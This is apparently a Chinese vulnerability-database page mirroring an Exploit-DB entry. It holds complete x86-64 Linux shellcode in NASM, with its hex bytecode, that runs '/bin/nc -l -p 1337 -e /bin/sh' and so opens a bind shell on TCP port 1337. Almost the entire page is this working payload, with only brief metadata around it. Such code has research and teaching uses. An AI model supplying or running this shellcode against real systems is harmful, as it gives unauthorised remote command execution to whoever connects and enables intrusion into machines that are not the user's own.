Linux/x64 - Bind (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057167 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86-64 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43601
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
; { Title: Shellcode linux/x86-64 bind-shell with netcat }

; Author  : Gaussillusion
; Len    : 131 bytes
; Language : NasmBITS 64
xor  	rdx,rdx
mov 	rdi,0x636e2f6e69622fff
shr	rdi,0x08
push 	rdi
mov 	rdi,rsp

mov	rcx,0x68732f6e69622fff
shr	rcx,0x08
push 	rcx
mov	rcx,rsp

mov   rbx,0x652dffffffffffff
shr	rbx,0x30
push	rbx
mov	rbx,rsp

mov	r10,0x37333331ffffffff
shr 	r10,0x20
push 	r10
mov	r10,rsp

mov	r9,0x702dffffffffffff
shr	r9,0x30
push 	r9
mov	r9,rsp

mov 	r8,0x6c2dffffffffffff
shr	r8,0x30
push 	r8
mov	r8,rsp

push	rdx ;push NULL
push 	rcx ;push address of 'bin/sh'
push	rbx ;push address of '-e'
push	r10 ;push address of '1337'
push	r9  ;push address of '-p'
push	r8  ;push address of '-l'
push 	rdi ;push address of '/bin/nc'

mov  	rsi,rsp
mov  	al,59
syscall

; _bytecode_start_
;\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
;\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62
;\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51\x48\x89\xe1
;\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb
;\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33
;\x33\x37\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\x49\xb9
;\xff\xff\xff\xff\xff\xff\x2d\x70\x49\xc1\xe9\x30\x41
;\x51\x49\x89\xe1\x49\xb8\xff\xff\xff\xff\xff\xff\x2d
;\x6c\x49\xc1\xe8\x30\x41\x50\x49\x89\xe0\x52\x51\x53
;\x41\x52\x41\x51\x41\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
; _bytecode_end_